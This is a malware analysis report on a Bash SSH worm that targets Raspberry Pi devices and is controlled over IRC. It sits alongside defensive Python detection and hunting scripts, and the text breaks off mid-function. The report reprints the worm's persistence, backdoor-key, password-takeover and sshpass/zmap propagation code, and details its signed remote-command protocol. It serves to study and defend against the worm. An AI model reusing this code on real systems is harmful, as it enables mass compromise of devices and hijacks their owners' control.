Severity: High | Category: Botnet

Linux.IRCBot/RaspiWorm — Raspberry Pi SSH Worm with IRC C2

Investigated: March 14, 2026 | Published: March 14, 2026
Tags: botnet, c2, exploit, iot, apt

Classification: Backdoor + SSH Worm + IRC Botnet
Analyst: GHOST / Breakglass Intelligence
Date: 2026-03-14
Confidence: HIGH


Executive Summary

This sample is a self-propagating Bash shell script targeting Raspberry Pi devices running default credentials. Upon execution it establishes persistence via /etc/rc.local, installs an RSA-authenticated IRC backdoor on the UnderNet network (channel #biret), and uses zmap + sshpass to scan and infect new SSH-exposed Raspberry Pi hosts on the internet.

The malware is a close match to samples documented by Dr.Web as Linux.Siggen.2359 (also cross-tracked as "EnslavePi" and similar to Linux.MulDrop.14). The threat actor leverages the legitimate UnderNet IRC network as C2 infrastructure—making network-layer blocking difficult without impacting legitimate IRC users—and uses a 1024-bit RSA key pair to authenticate commands, preventing bot hijacking by rival operators.

What it does:

  • Kills competing IoT malware (Mirai variants, kaiten, miners, zmap)
  • Blocks competitor C2 domain bins.deutschland-zahlung.eu via /etc/hosts
  • Installs SSH backdoor key into /root/.ssh/authorized_keys
  • Changes pi user password to attacker-controlled hash
  • Deploys IRC bot connecting to 6 UnderNet servers, joining #biret
  • Propagates to new Raspberry Pi hosts via SSH (pi:raspberry, pi:raspberryraspberry993311)

Who is behind it: Unknown opportunistic threat actor; the C2 operator holds the RSA private key corresponding to the embedded 1024-bit public key. The use of UnderNet IRC suggests a low-budget operation. Infrastructure reuse and the hardcoded SSH backdoor key provide cross-campaign tracking capability.


Sample Metadata

Field | Value
--- | ---
SHA256 | 0c889251c703623c3397893515aae9624f45c609fcf5881ace4b2e0a1857a88f
MD5 | 53a00708025b192567c4ac2a28851686
SHA1 | f36954f155d91423022d940701f59d948d0df2cb
SSDEEP | 96:1RYZxQOBpLyxIcymLKY8M991wuIaQPYPW:1RJObLyxIIYMdwuwPYPW
TLSH | T1C5A1E750112C1AB17246697AD26FFA52B90EC81B0A7B7B358473A63C74F9DB8E0396C1
File Type | Bash shell script (with binary magic header)
File Size | 4,766 bytes
First Seen (VT) | 2025-09-15 14:53:45 UTC
Last Scanned (VT) | 2026-03-05 17:20:02 UTC
VT Detections | 39/76 (51%)
VT Submissions | 8 (4 unique sources)
Reporter | SamBurchmann
Filename | 0c889251c703623c3397893515aae9624f45c609fcf5881ace4b2e0a1857a88f

VT Detection Summary (Selected)

Engine | Detection Name
--- | ---
Microsoft | Backdoor:Linux/IRCbot.YA!MTB
Sophos | SH/IRCBot-ANS
Kaspersky | HEUR:Backdoor.Linux.Agent.bc
DrWeb | Linux.Siggen.2359
ESET-NOD32 | Linux/Agent.AGK trojan
Symantec | IRC.Backdoor.Trojan
AhnLab-V3 | Backdoor/Shell.IRCbot.S1490
Fortinet | BASH/IRCBot.AU!tr
F-Secure / Avira | LINUX/CoinMiner.ABB
TrendMicro | Possible_IRCBOT.SMLBO
Rising | Backdoor.IRCbot/BASH!9.2A124
Lionic | Trojan.Script.IRCBot.m!c
CAT-QuickHeal | Script.shellBotnet.37854

Static Analysis

File Header / Magic Bytes

The file begins with an anomalous header line before #!/bin/bash:

C0755 4745 EouDsLRq

Breaking this down:

  • C0755 — likely encodes Unix file permissions (0755 = rwxr-xr-x, C prefix possibly a version or type flag)
  • 4745 — unknown field; may encode a checksum, size, or version identifier
  • EouDsLRq — Base64 decodes to \x12\x8b\x83\xb0\xb4j (6 bytes of binary; likely an embedded hash or nonce)

This metadata line is consistent with how some IoT worm variants tag propagated copies to track infection generations. It is not a Makeself marker.
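The tag-line layout described above can be checked mechanically during triage. The parser below is an added example written for this report; it is not code from the sample or from any referenced vendor analysis. The shape it matches ("C" + octal mode, a decimal field, a Base64 field, then the shebang on the next line) is an assumption generalised from this one sample, and the field meanings it labels follow the hypothesis stated above. The sample input is constructed from the observed header line.

```python
import base64
import binascii
import re

# Constructed sample input: the tag line seen on this sample, then the shebang.
# The script body below the shebang is a placeholder, not the worm's code.
SAMPLE_HEAD = b"C0755 4745 EouDsLRq\n#!/bin/bash\n# ... script body ...\n"

# Assumed shape of the pre-shebang tag line: "C<octal mode> <decimal field> <Base64 field>".
# The field meanings are this report's working hypothesis, not a documented format.
TAG_LINE_RE = re.compile(rb"^C([0-7]{3,4}) ([0-9]+) ([A-Za-z0-9+/]+=*)$")


def parse_tag_header(data):
    """Describe a "C0755 ..." tag line that precedes the shebang, or return None.

    data: the leading bytes of a file (the first few hundred are enough).
    Returns the decoded mode, the numeric field, the raw bytes of the Base64
    field and the shebang line that follows the tag.
    """
    first_nl = data.find(b"\n")
    if first_nl < 0:
        return None
    tag, rest = data[:first_nl].rstrip(b"\r"), data[first_nl + 1:]
    m = TAG_LINE_RE.match(tag)
    if m is None or not rest.startswith(b"#!"):
        return None
    mode, number, b64 = m.groups()
    try:
        blob = base64.b64decode(b64, validate=True)
    except binascii.Error:
        return None
    return {
        "mode": int(mode, 8),          # 0o755 -> rwxr-xr-x
        "field2": int(number),         # unknown meaning (4745 on this sample)
        "blob": blob,                  # 6 opaque bytes on this sample
        "blob_hex": blob.hex(),
        "shebang": rest.split(b"\n", 1)[0].decode("ascii", "replace"),
    }


def triage_file(path):
    """Read the head of a file on disk and report whether it carries the tag line."""
    with open(path, "rb") as fh:
        return parse_tag_header(fh.read(512))


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        info = triage_file(p)
        print(p, "tagged" if info else "no tag line", info or "")
```

When such a file is run with `bash <file>`, the tag line is simply an unknown command: bash reports it as not found and continues with the rest of the script, so the header never interferes with execution and is easy to overlook in a quick read.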

Script Logic — Full Annotated Flow

Stage 1: Privilege Escalation

MYSELF=`realpath $0`
if [ "$EUID" -ne 0 ]; then
    NEWMYSELF=`mktemp -u 'XXXXXXXX'`
    sudo cp $MYSELF /opt/$NEWMYSELF
    sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
    sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
    sudo sh -c "echo 'exit 0' >> /etc/rc.local"
    sleep 1
    sudo reboot
fi

If not running as root, the script:

  1. Copies itself to /opt/<random-name> via sudo
  2. Overwrites /etc/rc.local to execute itself on every boot
  3. Reboots — next boot runs as root

Stage 2: Competitor Elimination

killall bins.sh minerd node nodejs
killall ktx-armv4l ktx-i586 ktx-m68k ktx-mips ktx-mipsel ktx-powerpc ktx-sh4 ktx-sparc
killall arm5 zmap kaiten perl

Killed processes indicate awareness of the IoT malware ecosystem:

  • minerd — CPU cryptocurrency miner
  • ktx-* — Mirai variant binaries (multiple CPU architectures)
  • kaiten — Classic IRC bot (Kaiten/Tsunami DDoS tool)
  • zmap — Internet scanner (used by competing worms)
  • bins.sh — Likely a Mirai loader/dropper script

Stage 3: Competitor C2 Blocking

echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts

Routes the competitor's binary distribution server to localhost, preventing the victim from receiving competitor malware or updates. The domain bins.deutschland-zahlung.eu currently does not resolve (SERVFAIL), which suggests the competitor was already disrupted or abandoned their infrastructure.

Stage 4: Credential Takeover

rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc
usermod -p '$6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1' pi

  • Deletes .bashrc for root and pi (removes any previous backdoors or forensic artifacts placed there)
  • Changes pi user's password to a SHA-512 crypt hash controlled by the attacker
  • This allows the worm to propagate using pi:<new_password> in future hops (second credential: raspberryraspberry993311)

Stage 5: SSH Backdoor Installation

mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN..." >> /root/.ssh/authorized_keys

SSH Backdoor Key:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1I
dE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR0
2c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22w
EGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCV
jBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B

Fingerprint: SHA256:8meXGfVBn7ruOmYMlZbuM8jqM42qeI9EYaDkFmSQX1Q (2048-bit RSA)

The attacker can SSH directly to any infected host as root, independent of the IRC bot.

Stage 6: Environment Setup

echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/ktx* /tmp/cpuminer-multi /var/tmp/kaiten

Adds Google DNS to ensure reliable resolution (target systems may have misconfigured DNS). Removes competitor malware artifacts from temp directories.

Stage 7: RSA Command Signing Key Deployment

cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs
glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW
rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF
WRq+Z8HYMvPlgSRA3wIDAQAB
-----END PUBLIC KEY-----
EOFMARKER

RSA C2 Signing Key Details:

  • Algorithm: RSA 1024-bit
  • Exponent: 65537
  • Used to authenticate commands received over IRC: the operator signs command hashes with the corresponding private key; bots verify with this public key before executing

This prevents rival IRC users from issuing commands to the botnet (bot hijacking protection).

Stage 8: IRC Bot Deployment (Embedded Script)

An inline Bash script is written to /tmp/<XXXXXXXX>, made executable, and launched with nohup:

SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}   # Nickname derived from system fingerprint (chars 24-32 of MD5)

Bot nickname is deterministically derived from the victim's uname -a output, providing a unique per-host identifier while being hard to predict externally.

C2 Protocol:

  1. Connects to one of 6 UnderNet IRC servers on port 6667 (chosen randomly)
  2. Sets NICK, sends USER user 8 * :IRC hi
  3. Responds to PING with PONG (keepalive)
  4. On first PING, joins channel #biret
  5. Waits for PRIVMSG messages containing two Base64 fields:
    • Field 3 (: delimited): RSA signature of command hash
    • Field 4: Base64-encoded command
  6. Verifies the signature: the Base64-decoded signature is passed to openssl rsautl -verify with the embedded public key, and the recovered value must equal the MD5 of the command
  7. If valid, executes command via bash -c and returns output Base64-encoded to sender

C2 Server List:

ix1.undernet.org       (port 6667)
ix2.undernet.org       (port 6667)
Ashburn.Va.Us.UnderNet.org   (port 6667)
Bucharest.RO.EU.Undernet.Org (port 6667)
Budapest.HU.EU.UnderNet.org  (port 6667)
Chicago.IL.US.Undernet.org   (port 6667)

After launching the bot, the script deletes the bot file from disk (rm -rf /tmp/$BOT) and deletes nohup.out. The bot process continues running but has no on-disk artifact.

Stage 9: Self-Propagation Engine

apt-get install zmap sshpass -y --force-yes

while [ true ]; do
    FILE=`mktemp`
    zmap -p 22 -o $FILE -n 100000      # Scan 100,000 random hosts for port 22
    killall ssh scp
    for IP in `cat $FILE`; do
        sshpass -praspberry scp ... $MYSELF pi@$IP:/tmp/$NAME  && \
            sshpass -praspberry ssh pi@$IP ... "chmod +x $NAME && bash -c ./$NAME" &
        sshpass -praspberryraspberry993311 scp ... $MYSELF pi@$IP:/tmp/$NAME  && \
            sshpass -praspberryraspberry993311 ssh pi@$IP ... "chmod +x $NAME && bash -c ./$NAME" &
    done
    rm -rf $FILE
    sleep 10
done

For every scan cycle:

  1. Scans 100,000 random internet hosts for open SSH (port 22)
  2. Attempts scp + ssh execution with two credentials:
    • pi:raspberry (default Raspberry Pi OS password)
    • pi:raspberryraspberry993311 (previously-infected host password)
  3. Successful infections logged to /opt/.r
  4. Runs in infinite loop with 10-second sleep between cycles
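From the network side, the propagation loop is a host that suddenly reaches tens of thousands of distinct addresses on TCP/22. The detector below is an added example for this report (not code from the sample): it buckets flow records per source into fixed time windows and flags sources whose count of distinct TCP/22 peers meets a threshold. The four-field flow format and the sample flows are constructed; real exporters (NetFlow/IPFIX, Zeek conn.log) carry the same fields under other names and need a small mapping step.

```python
from collections import defaultdict

WINDOW_SECONDS = 60
DISTINCT_TARGET_THRESHOLD = 50   # distinct TCP/22 peers per source per window; tune to your baseline


def parse_flow_line(line):
    """Parse one constructed flow record: '<epoch> <src_ip> <dst_ip> <dst_port>'."""
    ts, src, dst, dport = line.split()
    return float(ts), src, dst, int(dport)


def detect_ssh_sweeps(flow_lines, window=WINDOW_SECONDS, threshold=DISTINCT_TARGET_THRESHOLD):
    """Return {source_ip: peak_distinct_targets} for sources that reached at least
    `threshold` distinct hosts on TCP/22 inside one `window`-second bucket.

    Fixed buckets are cheap, but a sweep that straddles a bucket boundary is
    split in two; lower the threshold or use overlapping windows if that matters.
    """
    targets = defaultdict(set)
    for line in flow_lines:
        ts, src, dst, dport = parse_flow_line(line)
        if dport == 22:
            targets[(src, int(ts // window))].add(dst)
    peaks = {}
    for (src, _bucket), dsts in targets.items():
        if len(dsts) >= threshold:
            peaks[src] = max(peaks.get(src, 0), len(dsts))
    return peaks


def build_sample_flows():
    """Constructed sample: an infected host (192.168.1.20) touching 150 distinct
    addresses on TCP/22 within three seconds, the footprint zmap -p 22 leaves,
    plus an admin workstation (192.168.1.10) with ordinary SSH and HTTPS traffic."""
    t0 = 1700000000.0
    lines = [f"{t0 + i * 0.02:.3f} 192.168.1.20 198.51.100.{i + 1} 22" for i in range(150)]
    lines += [
        f"{t0 + 5:.3f} 192.168.1.10 192.168.1.2 22",
        f"{t0 + 9:.3f} 192.168.1.10 192.168.1.3 22",
        f"{t0 + 12:.3f} 192.168.1.10 203.0.113.7 443",
    ]
    return lines


SAMPLE_FLOWS = build_sample_flows()

if __name__ == "__main__":
    for src, peak in detect_ssh_sweeps(SAMPLE_FLOWS).items():
        print(f"{src}: {peak} distinct TCP/22 targets in one {WINDOW_SECONDS}s window")
```

A threshold of 50 distinct peers per minute is far below what a 100,000-host zmap cycle produces, yet above what a jump host or configuration-management server normally does; measure your own baseline before alerting on it.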

Infection Chain / Kill Chain

[Internet-Exposed Raspberry Pi with default creds]
          │
          ▼ (SSH, pi:raspberry or pi:raspberryraspberry993311)
[Initial Access — T1078.001]
          │
          ▼ (sudo cp + /etc/rc.local modification)
[Persistence — T1037.004]
          │
          ▼ (sudo reboot → runs as root)
[Privilege Escalation — T1548.003]
          │
          ├──► [Kill competitors — T1562.001]
          ├──► [Block competitor C2 in /etc/hosts — T1562.006]
          ├──► [Change pi password — T1098]
          ├──► [Install SSH backdoor key — T1098.004]
          ├──► [Set DNS to 8.8.8.8 — T1490]
          │
          ▼ (write RSA pubkey, deploy IRC bot script)
[Command & Control — T1071 / IRC over port 6667]
          │   UnderNet #biret channel
          │   Operator sends RSA-signed Base64 commands
          │   Bot executes and returns output
          │
          ▼ (apt-get install zmap sshpass; zmap -p 22 -n 100000)
[Network Scan — T1046]
          │
          ▼ (sshpass SCP + SSH execution loop)
[Lateral Movement / Propagation — T1021.004]
          │
          └──► [New Raspberry Pi Victim] ──► (repeat)

Behavioral Analysis (Inferred from Static + OSINT)

Post-Compromise Capabilities (via IRC C2)

Since the IRC bot executes arbitrary RSA-signed bash commands and returns output, the operator has full remote code execution on all bots. Inferred capabilities based on the bot infrastructure and competing malware killed:

  • DDoS execution: Kaiten (killed competitor) is a DDoS tool; this bot likely supports DDoS attacks on demand
  • Cryptomining: minerd is killed as a competitor; operator could deploy their own miner
  • Credential harvesting: Shell access allows reading /etc/shadow, SSH keys, etc.
  • Proxy/relay: Bots can serve as SOCKS proxies for further attacks
  • Download and execute: Any binary can be fetched and run via the IRC command channel

Target Profile

  • Raspberry Pi devices (explicit targeting of pi user and Raspberry Pi default password)
  • Any ARM/x86 Linux host with SSH exposed and default credentials
  • Estimated victim pool: Any of the millions of Raspberry Pi devices with SSH internet-exposed

Network Indicators — C2 Infrastructure

IRC C2 — UnderNet Network

The malware uses the legitimate public UnderNet IRC network as C2. It does NOT operate private infrastructure — all IRC servers contacted are real UnderNet network nodes. This makes IP-based blocking impractical without also blocking legitimate UnderNet users.

Server FQDN | Resolved IPs | ASN | Provider | Country | IRC Ports
--- | --- | --- | --- | --- | ---
ix1.undernet.org | 194.68.45.100 | AS31800 | DALnet | Sweden (Solna) | 6667, 6668
ix2.undernet.org | 45.58.183.18 | AS46844 | Sharktech | Netherlands (Amsterdam) | 6667, 6662
Ashburn.Va.Us.UnderNet.org | 186.233.185.155, 172.83.156.122, 104.152.54.52, 199.71.214.87 | Various | | USA | 6661–6668, 7000
Bucharest.RO.EU.Undernet.Org | 94.125.182.255, 185.117.74.172, 185.243.218.59 | Various | | EU | 6661–6668
Budapest.HU.EU.UnderNet.org | 94.125.182.255 | | | Hungary | 6666–6668
Chicago.IL.US.Undernet.org | 104.152.54.52 | | | USA | 6661–6668, 7000

IRC Channel: #biret
Protocol: IRC over TCP/6667 (plain, no TLS)
C2 Method: RSA-signed PRIVMSG commands in Base64

Shodan Intelligence on Key IRC IPs

IP | Hostname | Org | Ports Confirmed
--- | --- | --- | ---
194.68.45.100 | | DALnet unrouted servers | 6667, 6668
45.58.183.18 | customer.sharktech.net | Sharktech Inc. | 6667, 6662
94.125.182.255 | ircu.atw.hu | | 6666, 6667, 6668
185.117.74.172 | ircu2.hostsailor.com | | 6661, 6666, 6667, 6668
185.243.218.59 | | | 6661, 6662, 6666–6668, 7000
104.152.54.52 | | | 6661, 6662, 6666–6668, 7000
199.71.214.87 | undernet.psychz.net | | 6661, 6662, 6666–6668, 7000

All IPs confirmed running cpe:/a:undernet:ircu (UnderNet IRC daemon).

Competitor C2 Domain

Domain | Status | Notes
--- | --- | ---
bins.deutschland-zahlung.eu | NXDOMAIN / SERVFAIL | Competitor binary distribution server; nullrouted by malware via /etc/hosts; registrar: TLD Registrar Solutions Ltd

MITRE ATT&CK TTPs

Technique ID | Name | Implementation
--- | --- | ---
T1078.001 | Valid Accounts: Default Accounts | Exploits pi:raspberry default Raspberry Pi credential
T1021.004 | Remote Services: SSH | Propagates via SSH using sshpass
T1037.004 | Boot or Logon Initialization Scripts: RC Scripts | Writes /etc/rc.local for persistence across reboots
T1098 | Account Manipulation | Changes pi user password hash
T1098.004 | Account Manipulation: SSH Authorized Keys | Adds attacker RSA key to /root/.ssh/authorized_keys
T1059.004 | Command and Scripting Interpreter: Unix Shell | All functionality implemented in Bash
T1046 | Network Service Scanning | Uses zmap to scan 100,000 hosts/cycle for open SSH (port 22)
T1018 | Remote System Discovery | zmap output provides list of SSH-reachable hosts
T1071 | Application Layer Protocol | Uses IRC over TCP/6667 as C2 channel
T1562.001 | Impair Defenses: Disable or Modify Tools | Kills 16 competing malware processes
T1562.006 | Impair Defenses: Indicator Blocking on Host | Nullroutes competitor C2 in /etc/hosts
T1070.004 | Indicator Removal: File Deletion | Deletes bot script from disk after launch; removes nohup.out
T1105 | Ingress Tool Transfer | SCP copies worm script to new victims
T1587.003 | Develop Capabilities: Digital Certificates | RSA key pair for C2 command authentication
T1136 | Create Account (via password change) | Effectively takes ownership of pi account

IOCs

File Hashes

Type | Hash
--- | ---
SHA256 | 0c889251c703623c3397893515aae9624f45c609fcf5881ace4b2e0a1857a88f
MD5 | 53a00708025b192567c4ac2a28851686
SHA1 | f36954f155d91423022d940701f59d948d0df2cb
SSDEEP | 96:1RYZxQOBpLyxIcymLKY8M991wuIaQPYPW:1RJObLyxIIYMdwuwPYPW

Network Indicators

Type | Value | Notes
--- | --- | ---
Domain | bins.deutschland-zahlung.eu | Competitor C2 (blocked by malware)
IP | 194.68.45.100 | UnderNet ix1, AS31800, Sweden
IP | 45.58.183.18 | UnderNet ix2, AS46844, Netherlands
IP | 94.125.182.255 | UnderNet EU/Budapest
IP | 185.117.74.172 | UnderNet EU/Bucharest
IP | 185.243.218.59 | UnderNet EU
IP | 104.152.54.52 | UnderNet US/Chicago/Ashburn
IP | 199.71.214.87 | UnderNet US/Ashburn
IP | 186.233.185.155 | UnderNet US
IP | 172.83.156.122 | UnderNet US
Port | TCP/6667 | IRC C2 communication
IRC Channel | #biret | C2 command channel on UnderNet
DNS | 8.8.8.8 | Added to /etc/resolv.conf

Host-Based Indicators

Type | Value | Notes
--- | --- | ---
File Path | /opt/<XXXXXXXX> | Worm copy (random 8-char name)
File Path | /etc/rc.local | Modified for boot persistence
File Path | /root/.ssh/authorized_keys | Backdoor SSH key appended
File Path | /tmp/public.pem | C2 RSA signing key (deleted after bot launch)
File Path | /tmp/bot.log | IRC bot stdout
File Path | /opt/.r | Log of successfully infected IPs
File Path | /tmp/.s | Timestamp file (date marker)
Process | zmap -p 22 | Port scan for propagation
Process | sshpass -praspberry | SSH propagation
Process | sshpass -praspberryraspberry993311 | SSH propagation
SSH Key | SHA256:8meXGfVBn7ruOmYMlZbuM8jqM42qeI9EYaDkFmSQX1Q | 2048-bit RSA backdoor key
Password | raspberry | Raspberry Pi default (targeted)
Password | raspberryraspberry993311 | Previously-infected host password (targeted)
Password Hash | $6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/...CYDeR1 | SHA-512 hash set on pi account

Cryptographic Keys

SSH Backdoor Public Key (RSA 2048-bit):

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1I
dE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR0
2c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22w
EGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCV
jBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B

Fingerprint: SHA256:8meXGfVBn7ruOmYMlZbuM8jqM42qeI9EYaDkFmSQX1Q

C2 Command Signing Key (RSA 1024-bit public key):

-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs
glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW
rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF
WRq+Z8HYMvPlgSRA3wIDAQAB
-----END PUBLIC KEY-----

Modulus: 00:bf:8a:14:de:d8:32:e6:1b:d8:6e:06:2f:43:b0:22:7d:d0:c2:6c:82:5b:fb:...


Campaign Context

Timeline

Date | Event
--- | ---
2017 | Linux.MulDrop.14 first documented by Dr.Web (predecessor campaign, same targeting)
2017–2018 | "EnslavePi" wave: same IRC channel (#biret), same SSH key observed across samples
2025-09-15 | This sample first submitted to VirusTotal (4 unique sources)
2026-03-05 | Last VT scan
2026-03-14 | Submitted to Breakglass Intelligence / this analysis

The killall targets reveal a picture of the competing IoT malware landscape this bot operates within:

Killed Process | Associated Malware Family
--- | ---
kaiten | Kaiten/Tsunami IRC DDoS bot
minerd | cpuminer-multi (cryptocurrency miner)
ktx-armv4l/i586/m68k/mips/mipsel/powerpc/sh4/sparc | Multi-arch Mirai variant binaries
arm5 | ARM-targeted IoT bot
zmap | Internet scanner (used by Masscan/ZMap worms)
bins.sh | Mirai-derived loader script
node/nodejs | Possibly Node.js-based bots

The blocking of bins.deutschland-zahlung.eu is significant — this domain was previously associated with a competing Mirai-based malware distribution operation. Its current SERVFAIL status suggests that campaign infrastructure has been torn down.


Attribution

Attribute | Assessment
--- | ---
Threat Actor | Unknown opportunistic actor; likely IoT botnet operator
Malware Family | Linux.IRCBot / EnslavePi variant (Dr.Web: Linux.Siggen.2359)
Operation Type | IoT botnet for DDoS/proxy/mining-as-a-service
Sophistication | Low-Medium: Bash-only, no binary exploitation, but uses RSA for C2 auth
Attribution Confidence | LOW (actor identity unknown)
Infrastructure Confidence | HIGH (all C2 infrastructure positively identified)

OPSEC Mistakes

The threat actor made several significant operational security errors that provide attribution and tracking capability:

  1. Hardcoded RSA signing key: The embedded 1024-bit RSA public key uniquely fingerprints the operator — the operator holds the only private key that can issue valid commands to this botnet. Any new samples using the same public key are from the same operator.

  2. Hardcoded SSH backdoor key: The 2048-bit RSA SSH public key (SHA256:8meXGfVBn7ruOmYMlZbuM8jqM42qeI9EYaDkFmSQX1Q) persists across campaign variants. This key can be used to cluster related samples and track infrastructure evolution.

  3. Plaintext IRC on public network: The entire C2 channel #biret on UnderNet is publicly joinable. Any researcher can join #biret on UnderNet and observe command traffic (though commands are signed, victim nicknames and system fingerprints are visible).

  4. Bot nickname derivation is traceable: Bot nicknames = a + chars 24–32 of md5(uname -a). This is deterministic per host — analysts can correlate nicks to specific compromised systems.

  5. Hardcoded propagation credentials in cleartext: Both raspberry and raspberryraspberry993311 are embedded in plaintext.

  6. Infection log left on disk: /opt/.r is a plaintext log of all successfully infected IPs — left readable on every infected host.


Infrastructure Map

ATTACKER (holds RSA-1024 private key + SSH-2048 private key)
    │
    │  RSA-signed commands (Base64/IRC PRIVMSG)
    ▼
[UnderNet IRC Network — Channel #biret]
    │   Servers randomly selected from pool of 6
    │
    ├── ix1.undernet.org:6667 (194.68.45.100) — Sweden/AS31800
    ├── ix2.undernet.org:6667 (45.58.183.18) — NL/AS46844/Sharktech
    ├── Ashburn.Va.Us.UnderNet.org:6667 → 4 US IPs
    ├── Bucharest.RO.EU.Undernet.Org:6667 → 3 EU IPs
    ├── Budapest.HU.EU.UnderNet.org:6667 (94.125.182.255)
    └── Chicago.IL.US.Undernet.org:6667 (104.152.54.52)
            │
            │  IRC PRIVMSG (RSA-verified commands → bash exec → Base64 response)
            ▼
    [Infected Raspberry Pi Bots — nick: a<hex8>]
            │
            │  SSH (pi:raspberry | pi:raspberryraspberry993311)
            │  zmap -p 22 -n 100000
            ▼
    [New Raspberry Pi Victims — worldwide]
            │
            └── [Direct SSH root access for attacker]
                  (SSH key SHA256:8meXGfVBn7ruOmYMlZbuM8jqM42qeI9EYaDkFmSQX1Q)

Recommendations

  1. Change default Raspberry Pi credentials immediately — do not use pi:raspberry
  2. Disable SSH password authentication — use key-based auth only
  3. Block outbound IRC (TCP/6660-6669, 7000) at network perimeter
  4. Monitor for zmap process execution — strong indicator of compromised host
  5. Monitor /etc/rc.local modification — persistence mechanism
  6. Monitor /root/.ssh/authorized_keys for unauthorized keys
  7. Check for /opt/.r file — infection log written to every compromised host
  8. Search authorized_keys for fingerprint SHA256:8meXGfVBn7ruOmYMlZbuM8jqM42qeI9EYaDkFmSQX1Q
  9. Block bins.deutschland-zahlung.eu at DNS (competitor C2 already down but may return)
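Items 4 to 8 above can be run as a single host check. The script below is an added example written for this report, not the sample's code and not a vendor tool. It separates collection from evaluation: hunt() takes the contents of the watched files and the running command lines, so the same logic runs against a live Raspberry Pi (collect_live, which needs root to read /etc/shadow) or against files copied out of a forensic image. Indicator values come from the report; the host state at the bottom is constructed for a dry run, and the constructed key's fingerprint is deliberately not on the watch list.

```python
import base64
import binascii
import hashlib
import os
import re

# Indicators taken from the report above.
BACKDOOR_KEY_FP = "SHA256:8meXGfVBn7ruOmYMlZbuM8jqM42qeI9EYaDkFmSQX1Q"
PI_HASH_PREFIX = "$6$vGkGPKUr$"          # salt of the hash the worm sets on the pi account
COMPETITOR_DOMAIN = "bins.deutschland-zahlung.eu"
ARTIFACT_PATHS = ("/opt/.r", "/tmp/.s", "/tmp/bot.log", "/tmp/public.pem")
WATCHED_FILES = ("/etc/rc.local", "/root/.ssh/authorized_keys", "/etc/shadow", "/etc/hosts") + ARTIFACT_PATHS
PROCESS_RE = re.compile(r"(^|[\s/])(zmap\s+-p\s*22|sshpass\s+-p)")


def ssh_key_fingerprint(authorized_keys_line):
    """OpenSSH-style SHA256 fingerprint (unpadded Base64) of one authorized_keys entry.

    Leading options without embedded spaces are skipped; quoted options that
    contain spaces are not handled here.
    """
    fields = authorized_keys_line.split()
    for i, field in enumerate(fields[:-1]):
        if field.startswith(("ssh-", "ecdsa-", "sk-")):
            digest = hashlib.sha256(base64.b64decode(fields[i + 1])).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    raise ValueError("not an authorized_keys entry")


def matching_keys(lines, ioc_fingerprints):
    """Fingerprints from `lines` that are on the watch list."""
    hits = []
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        try:
            fp = ssh_key_fingerprint(line)
        except (ValueError, binascii.Error):
            continue
        if fp in ioc_fingerprints:
            hits.append(fp)
    return hits


def hunt(fs, cmdlines, ioc_fingerprints=frozenset({BACKDOOR_KEY_FP})):
    """fs: {path: text} for the watched files that exist; cmdlines: process command lines.
    Returns [(category, detail)]."""
    findings = []
    for line in fs.get("/etc/rc.local", "").splitlines():
        if re.match(r"^/opt/\S+\s*$", line):          # the worm writes "/opt/<8 random chars>"
            findings.append(("rc.local", f"boot-time execution of {line.strip()}"))
    for fp in matching_keys(fs.get("/root/.ssh/authorized_keys", "").splitlines(), ioc_fingerprints):
        findings.append(("authorized_keys", f"watch-listed key present: {fp}"))
    for line in fs.get("/etc/shadow", "").splitlines():
        parts = line.split(":")
        if parts[0] == "pi" and len(parts) > 1 and parts[1].startswith(PI_HASH_PREFIX):
            findings.append(("shadow", "pi password hash carries the worm's salt " + PI_HASH_PREFIX))
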